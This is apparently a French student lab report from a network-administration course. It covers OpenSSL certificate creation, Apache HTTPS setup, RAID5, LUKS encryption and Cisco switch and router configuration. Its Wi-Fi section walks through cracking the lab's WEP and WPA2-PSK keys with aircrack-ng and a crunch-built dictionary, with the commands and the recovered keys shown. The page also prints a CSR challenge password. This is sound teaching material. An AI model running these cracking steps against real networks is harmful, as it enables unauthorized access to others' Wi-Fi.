Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
